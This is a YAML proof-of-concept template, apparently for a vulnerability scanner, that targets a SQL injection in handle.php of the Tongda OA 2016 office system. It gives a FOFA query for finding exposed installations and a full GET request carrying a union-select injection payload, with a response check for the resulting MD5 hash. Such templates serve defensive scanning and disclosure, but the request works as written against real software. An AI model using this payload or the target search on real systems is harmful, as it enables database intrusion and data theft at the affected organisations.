product: 通达OA
vName: 通达OA 2016网络智能办公系统 handle.php SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 北京通达信科科技有限公司通达OA2016网络智能办公系统 handle.php 存在sql注入漏洞，攻击者可利用此漏洞获取数据库管理员权限，查询数据、获取系统信息，威胁企业单位数据安全。
version: ''
note: ''
search:
  FOFA: app="TDXK-通达OA" && body="2016"
protocol: http
link: https://blog.csdn.net/CommputerMac/article/details/133869825
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /share/handle.php?_GET[module]=1%27+and+1={`=%27`+1}+and+1=0+union+select+(select/**/md5(123456))--+%27
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and